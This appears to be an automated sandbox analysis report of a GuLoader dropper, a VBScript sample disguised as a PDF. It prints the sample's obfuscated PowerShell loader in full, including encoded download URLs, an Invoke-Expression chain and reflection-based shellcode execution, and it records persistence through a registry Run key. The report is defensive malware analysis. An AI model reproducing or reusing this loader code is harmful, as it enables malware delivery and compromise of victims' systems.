              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: cqm.Core.pdb source: powershell.exe, 00000006.00000002.1726800526.00000000079E9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: powershell.exe, 00000006.00000002.1726800526.000000000796E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: stem.Core.pdb* source: powershell.exe, 00000006.00000002.1726800526.00000000079E9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdbk source: powershell.exe, 00000006.00000002.1726800526.000000000796E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb^R source: powershell.exe, 00000006.00000002.1726800526.00000000079E9000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              VBScript performs obfuscated calls to suspicious functions
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell " <#Semipoor Radiculose Hornuglen Laminaterne Cadesse Freespac #>;$Henkastet='Splenetically35';<#Kasko", "0")
              Yara detected GuLoader
              Source: Yara matchFile source: 00000009.00000002.2618570494.00000000053D8000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.1737667724.000000000AAA8000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.1737463772.0000000008E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.1718585876.0000000006142000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.1465567193.00000229F6255000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Found suspicious powershell code related to unpacking or dynamic code loading
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Quiniretin)$gloBal:CYclIzES = [sysTeM.TeXt.EncOdiNg]::AsCIi.GetsTrINg($sKilteSKriFten)$gLoBAl:slgtsfEjDEn114=$CyCLIzES.sUBStRInG($baNQUetTE,$gYnobAsIc)<#Waxhearted Andedams Echeneida
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Multisync $Henstodjaerges252 $Bemalings), (Uninvestigable @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:monologists = [AppDomain]::CurrentDomain.GetAssem
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($grnsestationen)), $Tachismes).DefineDynamicModule($Taalmodiges, $false).DefineType($Narkomaner, $cykelrytteres, [System.MulticastDeleg
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Quiniretin)$gloBal:CYclIzES = [sysTeM.TeXt.EncOdiNg]::AsCIi.GetsTrINg($sKilteSKriFten)$gLoBAl:slgtsfEjDEn114=$CyCLIzES.sUBStRInG($baNQUetTE,$gYnobAsIc)<#Waxhearted Andedams Echeneida
              Suspicious powershell command line found
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Semipoor Radiculose Hornuglen Laminaterne Cadesse Freespac #>;$Henkastet='Splenetically35';<#Kaskoforsikre Bollix Rdslens #>;$Stepway=$Sammentrdninger+$host.UI; function Tuggery($cracks){If ($Stepway) {$Rupturable++;}$Seerlike=$Ordrebeholdningernes+$cracks.'Length'-$Rupturable; for( $Pickaxes=4;$Pickaxes -lt $Seerlike;$Pickaxes+=5){$Undertrkkene=$Pickaxes;$Fascinationen+=$cracks[$Pickaxes];$Bronchoesophagoscopy='Noomis';}$Fascinationen;}function Phonogramically($Karaktermord){ . ($fritflue) ($Karaktermord);}$Finalismens=Tuggery 'SurmMPo aoUnsezAllei,syklTra.l Proa Rep/Spar ';$Finalismens+=Tuggery 'N ct5S ng. Kar0Deut Ne (DeliWYdmyipaponbombdBoreoRegnwstansK tt AcouNValvTTabl Lept1Rere0Fami.M al0 ps;Unsc Ha,nWaeroiLyrinRefl6Star4sca ;Clip chylxFutu6Li h4tax ; Blr DefarCryov Q,i:Tinc1Re.i3 Kod1Stop.Term0 .eo)Sp.j FabuGTraneS.ltcDentk rinoB ne/Unde2Si n0Konk1Kabi0Hu.d0Umbr1 Agn0Note1Guri SndFautoiSa,drAnteeCob fLuckoPa,ax van/ gtp1Per.3Sini1Salm.Sta 0L.ks ';$brokbinds=Tuggery 'stafu.ankSMongE HabR unm-ste aH lkg T,oeBedrNF.lutBedr ';$Hematozoan=Tuggery 'noeshBagetKoortRefepUransDisk:clei/Krak/ Sliw RenwA,etwTekn. AntgTnksr Sluo DecuSublpVi.erOveri,apoaProgm Hou.WithcClaso jemRa,e/SminMF.vraEr,vnNiddd DrisBipecMandhByzaaPre uArnuvVicaiEr.vnIn qiFraasRavemSysseDefl. DissHemanLovlp rug> RenhBuk tCheftRej.pSands emi:Verr/Sple/OejnbOrrorKaktuSub t Sa aUdsd.Ahorp.lurl Sy /Sor MHkkeaAfg n etrdMi lsDivucheelhDisca Tu uShawvAfstinon nSpkkiForvsFo mm.lageSkru.Ca bs RevnBesppAnel ';$dacha=Tuggery ' Shi>Blue ';$fritflue=Tuggery 'Resai PineRagsX ugg ';$Dessinatren='solstraalehistoriers';$Sygne='\Sttefiskenes.Tav';Phonogramically (Tuggery 'Prod$ BolGSydkL.umaOTratbbetaa SpolBis.: elldTezcIPrsiSA.beKStanS Absp Proe HanCCystiHa,tF ngmiTunnKNonpA alot laiIAmbiolaboNLeukeboflrKontS Syn2 Kla4Exci8Ceph=chit$Ungde L sN ftev Non:ewerAR vapSupepAdu.DSataAB ugtbefaatuft+G.da$CplbSAutoYFritG waiNAdfrEBg r ');Phonogramically (Tuggery 'br d$UratGRelalHerbo U,hb YikaTo,mL H.k:CanaBOpsirSkibUSlukgMonoeEsquRFires ixeSaffRCa sV ConIApatc BudERist=Komm$be yhMurdEBeweMEurhaPigrtUnciobadezSmalOForuADoorNMeal. De,s En PExodl.eenIHemiTHyal( agt$GangDPaniaschlC SatHSjusafunk)t,im ');Phonogramically (Tuggery 'thro[FlerNHeptECasttCaes. Pe SK mmECardRStamVTilbiHaanCLns eAdipPDr.goDramiChronKbslt .limVar.A acknBe oaAdelgHed.eSatcR nde]Enke:Ring: Pr s Kone U gCLae,U SneRKariI TreTVejrysup p TrarUimoo SaltKltroAfsvCGlucoEpenLFjel Tris=beha P ke[RunoNSweeETab.tV.nd.AmbasIndkeEva C Mi.UDestRBeslIEuphtTe,ly VirpRaadrE erO.ascTBr.rOHyg C Diao.epaLF,sttGoniYHestP v eEJobb]Si.d:Dkna:D taTJa.bL,ukksSe i1Dich2Olip ');$Hematozoan=$Brugerservice[0];$Discriminatingness=(Tuggery ' asd$ ntegLu tL eclOAntibS,rhAFabrLF lk:Retsg FolrRygeUUdreN ChaDMil.LBlemNSk,fS Pho=CoutNIndieAporwUros-CaseO rthbHannjReg eAst,C T it ggr PresVid.YsoliS ult BliECombm Ste.MandnTh.rEst.lTSali.
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Semipoor Radiculose Hornuglen Laminaterne Cadesse Freespac #>;$Henkastet='Splenetically35';<#Kaskoforsikre Bollix Rdslens #>;$Stepway=$Sammentrdninger+$host.UI; function Tuggery($cracks){If ($Stepway) {$Rupturable++;}$Seerlike=$Ordrebeholdningernes+$cracks.'Length'-$Rupturable; for( $Pickaxes=4;$Pickaxes -lt $Seerlike;$Pickaxes+=5){$Undertrkkene=$Pickaxes;$Fascinationen+=$cracks[$Pickaxes];$Bronchoesophagoscopy='Noomis';}$Fascinationen;}function Phonogramically($Karaktermord){ . ($fritflue) ($Karaktermord);}$Finalismens=Tuggery 'SurmMPo aoUnsezAllei,syklTra.l Proa Rep/Spar ';$Finalismens+=Tuggery 'N ct5S ng. Kar0Deut Ne (DeliWYdmyipaponbombdBoreoRegnwstansK tt AcouNValvTTabl Lept1Rere0Fami.M al0 ps;Unsc Ha,nWaeroiLyrinRefl6Star4sca ;Clip chylxFutu6Li h4tax ; Blr DefarCryov Q,i:Tinc1Re.i3 Kod1Stop.Term0 .eo)Sp.j FabuGTraneS.ltcDentk rinoB ne/Unde2Si n0Konk1Kabi0Hu.d0Umbr1 Agn0Note1Guri SndFautoiSa,drAnteeCob fLuckoPa,ax van/ gtp1Per.3Sini1Salm.Sta 0L.ks ';$brokbinds=Tuggery 'stafu.ankSMongE HabR unm-ste aH lkg T,oeBedrNF.lutBedr ';$Hematozoan=Tuggery 'noeshBagetKoortRefepUransDisk:clei/Krak/ Sliw RenwA,etwTekn. AntgTnksr Sluo DecuSublpVi.erOveri,apoaProgm Hou.WithcClaso jemRa,e/SminMF.vraEr,vnNiddd DrisBipecMandhByzaaPre uArnuvVicaiEr.vnIn qiFraasRavemSysseDefl. DissHemanLovlp rug> RenhBuk tCheftRej.pSands emi:Verr/Sple/OejnbOrrorKaktuSub t Sa aUdsd.Ahorp.lurl Sy /Sor MHkkeaAfg n etrdMi lsDivucheelhDisca Tu uShawvAfstinon nSpkkiForvsFo mm.lageSkru.Ca bs RevnBesppAnel ';$dacha=Tuggery ' Shi>Blue ';$fritflue=Tuggery 'Resai PineRagsX ugg ';$Dessinatren='solstraalehistoriers';$Sygne='\Sttefiskenes.Tav';Phonogramically (Tuggery 'Prod$ BolGSydkL.umaOTratbbetaa SpolBis.: elldTezcIPrsiSA.beKStanS Absp Proe HanCCystiHa,tF ngmiTunnKNonpA alot laiIAmbiolaboNLeukeboflrKontS Syn2 Kla4Exci8Ceph=chit$Ungde L sN ftev Non:ewerAR vapSupepAdu.DSataAB ugtbefaatuft+G.da$CplbSAutoYFritG waiNAdfrEBg r ');Phonogramically (Tuggery 'br d$UratGRelalHerbo U,hb YikaTo,mL H.k:CanaBOpsirSkibUSlukgMonoeEsquRFires ixeSaffRCa sV ConIApatc BudERist=Komm$be yhMurdEBeweMEurhaPigrtUnciobadezSmalOForuADoorNMeal. De,s En PExodl.eenIHemiTHyal( agt$GangDPaniaschlC SatHSjusafunk)t,im ');Phonogramically (Tuggery 'thro[FlerNHeptECasttCaes. Pe SK mmECardRStamVTilbiHaanCLns eAdipPDr.goDramiChronKbslt .limVar.A acknBe oaAdelgHed.eSatcR nde]Enke:Ring: Pr s Kone U gCLae,U SneRKariI TreTVejrysup p TrarUimoo SaltKltroAfsvCGlucoEpenLFjel Tris=beha P ke[RunoNSweeETab.tV.nd.AmbasIndkeEva C Mi.UDestRBeslIEuphtTe,ly VirpRaadrE erO.ascTBr.rOHyg C Diao.epaLF,sttGoniYHestP v eEJobb]Si.d:Dkna:D taTJa.bL,ukksSe i1Dich2Olip ');$Hematozoan=$Brugerservice[0];$Discriminatingness=(Tuggery ' asd$ ntegLu tL eclOAntibS,rhAFabrLF lk:Retsg FolrRygeUUdreN ChaDMil.LBlemNSk,fS Pho=CoutNIndieAporwUros-CaseO rthbHannjReg eAst,C T it ggr PresVid.YsoliS ult BliECombm Ste.MandnTh.rEst.lTSali.
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Semipoor Radiculose Hornuglen Laminaterne Cadesse Freespac #>;$Henkastet='Splenetically35';<#Kaskoforsikre Bollix Rdslens #>;$Stepway=$Sammentrdninger+$host.UI; function Tuggery($cracks){If ($Stepway) {$Rupturable++;}$Seerlike=$Ordrebeholdningernes+$cracks.'Length'-$Rupturable; for( $Pickaxes=4;$Pickaxes -lt $Seerlike;$Pickaxes+=5){$Undertrkkene=$Pickaxes;$Fascinationen+=$cracks[$Pickaxes];$Bronchoesophagoscopy='Noomis';}$Fascinationen;}function Phonogramically($Karaktermord){ . ($fritflue) ($Karaktermord);}$Finalismens=Tuggery 'SurmMPo aoUnsezAllei,syklTra.l Proa Rep/Spar ';$Finalismens+=Tuggery 'N ct5S ng. Kar0Deut Ne (DeliWYdmyipaponbombdBoreoRegnwstansK tt AcouNValvTTabl Lept1Rere0Fami.M al0 ps;Unsc Ha,nWaeroiLyrinRefl6Star4sca ;Clip chylxFutu6Li h4tax ; Blr DefarCryov Q,i:Tinc1Re.i3 Kod1Stop.Term0 .eo)Sp.j FabuGTraneS.ltcDentk rinoB ne/Unde2Si n0Konk1Kabi0Hu.d0Umbr1 Agn0Note1Guri SndFautoiSa,drAnteeCob fLuckoPa,ax van/ gtp1Per.3Sini1Salm.Sta 0L.ks ';$brokbinds=Tuggery 'stafu.ankSMongE HabR unm-ste aH lkg T,oeBedrNF.lutBedr ';$Hematozoan=Tuggery 'noeshBagetKoortRefepUransDisk:clei/Krak/ Sliw RenwA,etwTekn. AntgTnksr Sluo DecuSublpVi.erOveri,apoaProgm Hou.WithcClaso jemRa,e/SminMF.vraEr,vnNiddd DrisBipecMandhByzaaPre uArnuvVicaiEr.vnIn qiFraasRavemSysseDefl. DissHemanLovlp rug> RenhBuk tCheftRej.pSands emi:Verr/Sple/OejnbOrrorKaktuSub t Sa aUdsd.Ahorp.lurl Sy /Sor MHkkeaAfg n etrdMi lsDivucheelhDisca Tu uShawvAfstinon nSpkkiForvsFo mm.lageSkru.Ca bs RevnBesppAnel ';$dacha=Tuggery ' Shi>Blue ';$fritflue=Tuggery 'Resai PineRagsX ugg ';$Dessinatren='solstraalehistoriers';$Sygne='\Sttefiskenes.Tav';Phonogramically (Tuggery 'Prod$ BolGSydkL.umaOTratbbetaa SpolBis.: elldTezcIPrsiSA.beKStanS Absp Proe HanCCystiHa,tF ngmiTunnKNonpA alot laiIAmbiolaboNLeukeboflrKontS Syn2 Kla4Exci8Ceph=chit$Ungde L sN ftev Non:ewerAR vapSupepAdu.DSataAB ugtbefaatuft+G.da$CplbSAutoYFritG waiNAdfrEBg r ');Phonogramically (Tuggery 'br d$UratGRelalHerbo U,hb YikaTo,mL H.k:CanaBOpsirSkibUSlukgMonoeEsquRFires ixeSaffRCa sV ConIApatc BudERist=Komm$be yhMurdEBeweMEurhaPigrtUnciobadezSmalOForuADoorNMeal. De,s En PExodl.eenIHemiTHyal( agt$GangDPaniaschlC SatHSjusafunk)t,im ');Phonogramically (Tuggery 'thro[FlerNHeptECasttCaes. Pe SK mmECardRStamVTilbiHaanCLns eAdipPDr.goDramiChronKbslt .limVar.A acknBe oaAdelgHed.eSatcR nde]Enke:Ring: Pr s Kone U gCLae,U SneRKariI TreTVejrysup p TrarUimoo SaltKltroAfsvCGlucoEpenLFjel Tris=beha P ke[RunoNSweeETab.tV.nd.AmbasIndkeEva C Mi.UDestRBeslIEuphtTe,ly VirpRaadrE erO.ascTBr.rOHyg C Diao.epaLF,sttGoniYHestP v eEJobb]Si.d:Dkna:D taTJa.bL,ukksSe i1Dich2Olip ');$Hematozoan=$Brugerservice[0];$Discriminatingness=(Tuggery ' asd$ ntegLu tL eclOAntibS,rhAFabrLF lk:Retsg FolrRygeUUdreN ChaDMil.LBlemNSk,fS Pho=CoutNIndieAporwUros-CaseO rthbHannjReg eAst,C T it ggr PresVid.YsoliS ult BliECombm Ste.MandnTh.rEst.lTSali.Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFE7CEE00BD pushad ; iretd 4_2_00007FFE7CEE00C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFE7CFB7886 push edi; iretd 4_2_00007FFE7CFB790A
              Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Startup keyJump to behavior
              Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Startup keyJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Uses an obfuscated file name to hide its real file extension (double extension)
              Source: Possible double extension: pdf.vbsStatic PE information: Scanned_22C-6e24090516030.pdf.vbs
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
